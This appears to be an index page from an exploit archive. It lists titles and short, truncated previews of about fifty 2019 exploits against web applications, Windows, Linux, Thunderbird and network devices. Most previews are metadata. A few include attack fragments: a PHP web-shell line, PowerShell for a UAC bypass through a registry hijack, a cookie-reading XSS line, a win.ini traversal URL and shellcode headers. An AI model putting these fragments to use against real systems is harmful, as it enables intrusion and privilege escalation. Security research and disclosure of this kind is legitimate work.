GSearch 1.0.1.0 - Denial of Service Exploit
Exploit Title: GSearch v1.0.1.0 - Denial of Service PoC Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693 Version: 1.0.1.0 Tested on: Windows 10 Proof of Concept: Run the python script, it will create a new file "PoC.txt" Cop...
GrandNode 4.40 - Path Traversal / Arbitrary File Download Vulnerabilities
Exploit for multiple platform in category web applications Exploit Title: GrandNode Path Traversal & Arbitrary File Download Unauthenticated Exploit Author: Corey Robinson https://twitter.com/CRobSec Vendor Homepage: https://grandnode.com/ Software Link:...
SAPIDO RB-1732 - Remote Command Execution Exploit
Exploit Title: SAPIDO RB-1732 command line execution Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests import sys def...
SeedDMS < 5.1.11 - (out.GroupMgr.php) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11 Exploit Author: Nimit Jain https://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...
Mozilla Spidermonkey - IonMonkey (Array.prototype.pop) Type Confusion Exploit
The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...
WordPress Live Chat Unlimited 2.8.3 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection Google Dork: inurl:"wp-content/plugins/screets-lcx" Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: https://screets.com/ Software Link:...
BlogEngine.NET 3.3.6/3.3.7 - (path) Directory Traversal Vulnerability
Exploit for asp platform in category web applications Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET i...
SuperDoctor5 - (NRPE) Remote Code Execution Exploit
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDoctor 5, which is their monitoring utility for SuperMicro chassis. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...
WordPress iLive 1.0.4 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF Date: 2019-06-19 Exploit Author: @XORcat Vendor Homepage: https://fortinet.com/ Software Link: Customer Account Required Version: v1.2.0.0 Tested on: Linux CVE : TBA !--...
SeedDMS versions < 5.1.11 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: Remote Command Execution through Unvalidated File Upload in SeedDMS versions "; $cmd = $REQUEST'cmd'; system$cmd; echo ""; die; ? Step 3: Now after uploading the file check the document id corresponding to the document. Step 4:...
Nagios XI Magpie_debug.php Root Remote Code Execution Exploit
This Metasploit module exploits two vulnerabilities in Nagios XI 5.5.6. One allows for unauthenticated remote code execution and another allows for local privilege escalation. When combined, these two vulnerabilities give us a root reverse shell. This module requires Metasploit:...
Coldfusion / JNBridge Remote Code Execution Exploit
Coldfusion versions 2016 and 2018 along with all current versions of JNBridge suffer from a remote code execution vulnerability. Product: Coldfusion/JNBridge Manufacturer: Adobe/JNBridge LLC Affected Versions: Coldfusion 2016,2018, JNBridge all versions Tested Versions: 2018 Vulnerability Type:...
Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)
Title: Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) - Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x86_64 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation Exploit
Windows: Windows Font Cache Service Insecure Sections EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The Windows Font Cache Service exposes section objects insecurely to low privileged...
Microsoft Windows - CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation Exploit
Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t...
EA Origin < 10.5.38 - Remote Code Execution Vulnerability
Exploit Title: EA Origin 10.5.38 Remote Code Execution Date: 05/22/2019 Exploit Author: Dominik Penner @zer0pwn Vendor Homepage: https://www.origin.com Software Link: https://www.origin.com/can/en-us/store/download Version: 10.5.38 and below Tested on: Windows 7, Windows 8, Windows 10 CVE :...
Tuneclone 2.20 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.-...
WebERP 4.15 - SQL injection Exploit
Exploit for php platform in category web applications Exploit Title: Blind SQL injection in WebERP. Exploit Author: Semen Alexandrovich Lyhin https://www.linkedin.com/in/semenlyhin/ Vendor Homepage: http://www.weberp.org/ Version: 4.15 A malicious query can be sent in base64 encoding to unseriali...
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection Exploit
Exploit for asp platform in category web applications Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10718 1. Description ============== BlogEngine.N...
Linux - Use-After-Free via race Between modify_ldt() and #BR Exception Exploit
/ When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking up the correct segment descriptor and adding the segment offset to...
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Exploit
This Metasploit module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the...
Cisco Prime Infrastructure Runrshell Privilege Escalation Exploit
Exploit for hardware platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Runrshell Privilege Escalation', 'Description' = %q This...
BlogEngine.NET 3.3.6/3.3.7 - theme Cookie Directory Traversal / Remote Code Execution Exploit
Exploit for asp platform in category web applications Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ==============...
BlogEngine.NET 3.3.7 Directory Traversal / Remote Code Execution Vulnerability #RCE
BlogEngine.NET versions 3.3.7 and earlier are vulnerable to two separate directory traversal issues that can lead to remote code execution. CVE-2019-10719...
Thunderbird ESR < 60.7.XXX - Type Confusion Vulnerability
Type confusion in Thunderbird ============================= Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities
Exploit for hardware platform in category web applications 1. Advisory Information ======================================== Title: Clever Dog Smart Camera Vendor Homepage: http://www.cleverdog.com.cn/ Tested on Camera types : DOG-2W, DOG-2W-V4 Vulnerability: Hardware- Multiple Vulnerabilities Dat...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write Vulnerability
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Product HC10 HC.Server Service 10.14 HC10 is a unified hosting...
Spring Security OAuth - Open Redirector Vulnerability
Exploit for java platform in category web applications Exploit Title: Open Redirector in spring-security-oauth2 Exploit Author: Riemann Vendor Homepage: https://spring.io/projects/spring-security-oauth Software Link: https://spring.io Version: Spring Security OAuth versions 2.3 prior to 2.3.6...
RedwoodHQ 2.5.5 - Authentication Bypass Vulnerability
Exploit for multiple platform in category web applications -- encoding: utf-8 -- !/usr/bin/python3 Exploit Title: RedxploitHQ Create Admin User by missing authentication on db Date: 14-june-2019 Exploit Author: EthicalHCOP Version: 2.0 / 2.5.5 Vendor Homepage: https://redwoodhq.com/ Software Link...
Sahi pro 8.x - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Sahi pro :/s/dyn/pro/DBReports?sql=SELECT DISTINCT memoryused AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS. FROM SUITEREPORTS,SCRIPTREPORTS 0day.today 2019-06-18...
Linux / FreeBSD TCP-Based Denial Of Service Vulnerability
Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels. The vulnerabilities specifically relate to the minimum segment size MSS and TCP Selective Acknowledgement SACK capabilities. The most serious, dubbed "SACK Panic," allows a remotely-triggered kernel panic ...
Thunderbird ESR < 60.7.XXX - icalrecur_add_bydayrules Stack-Based Buffer Overflow Vulnerability
Stack-based buffer overflow in Thunderbird ========================================== Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits / CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main ch...
AROX School-ERP Pro - Unauthenticated Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AROX School-ERP Pro Unauthenticated Remote Code Execution", 'Description' = %q This module exploits a command execution vulnerability in AROX...
Sahi pro 7.x/8.x - Directory Traversal Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sahi pro :/s/dyn/Loghighlight?href=../../../../windows/win.ini&n=1selected 0day.today 2019-06-18...
Netperf 2.6.0 - Stack-Based Buffer Overflow Exploit
Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: Netperf 2.6.0 is a benchmark tool developed by Hewlett Packard that can be used to measure the performance of many different types of networking. It provides tests for both unidirectional throughput...
Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)
Title: Linux/x86_64 - execve(/bin/sh) 22 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x86_64 ;Shellcode Length: 22 bytes ;github = https://github.com/STARRBOY ============ASM=========================== global start section .text start: ;int execveconst char filename, char const argv,char const...
Thunderbird ESR < 60.7.XXX - parser_get_next_char Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Sahi pro 8.x - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sahi pro alertdocument.cookie”.start; log“testing stored XSS injection”; $tc1.end; Step 2 : Execute the created script poc.sah using sahi GUI controller . Step 3 : navigate to the web logs console http://:/logs using the...
Thunderbird ESR < 60.7.XXX - icalmemorystrdupanddequote Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell) Exploit
Exploit for windows platform in category local exploits Interactive Version: function SluiHijackBypass Param ParameterMandatory=$True String$command, ValidateSet64,86 int$arch = 64 Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path...
Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
Title: Linux/x86 - Reposition + INC encoder with execve/bin/sh Shellcode 66 bytes Author: Jonathan So Purpose: decode and spawn a /bin/sh shell Tested On: Linux kali 4.19.0-kali4-686 1 SMP Debian 4.19.28-2kali1 2019-03-18 i686 GNU/Linux Arch: x86 Size: 66 bytes Write-up Link:...
Exim 4.91 Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits !/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may...
Aida64 6.00.5100 - (Log to CSV File) Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Vendor Homepage: https://www.aida64.com/downloads Software Link:...
CentOS 7.6 - ptrace_scope Privilege Escalation Exploit #RCE #LPE
Exploit for linux platform in category local exploits !/usr/bin/env bash 'ptrace_scope' misconfiguration Local Privilege Escalation Affected operating systems TESTED: Parrot Home/Workstation 4.6 Latest Version Parrot Security 4.6 Latest Version CentOS / RedHat 7.6 Latest Version Kali Linux 2018.4...
Pronestor Health Monitoring 8.1.11.0 - Privilege Escalation Vulnerability
Exploit for windows platform in category local exploits Pronestor Health Monitoring sc qc PNHM SERVICENAME: PNHM TYPE : 10 WIN32OWNPROCESS STARTTYPE : 2 AUTOSTART ERRORCONTROL : 1 NORM...
Sitecore 8.x - Deserialization Remote Code Execution Vulnerability
Exploit for asp platform in category web applications Exploit Title: Sitecore v 8.x Deserialization RCE Date: Reported to vendor October 2018, fix released April 2019. Exploit Author: Jarad Kopf Vendor Homepage: https://www.sitecore.com/ Software Link: Sitecore downloads:...
FusionPBX 4.4.3 - Remote Command Execution Exploit #RCE
Exploit for php platform in category web applications Exploit Title: FusionPBX = 4.4.3 Command Injection RCE via XSS Date: 06-11-2019 Exploit Author: Dustin Cobb Vendor Homepage: https://www.fusionpbx.com Software Link: https://github.com/fusionpbx/fusionpbx Version: = 4.4.3 Tested on:...
phpMyAdmin 4.8 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Cross Site Request Forgery CSRF Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker...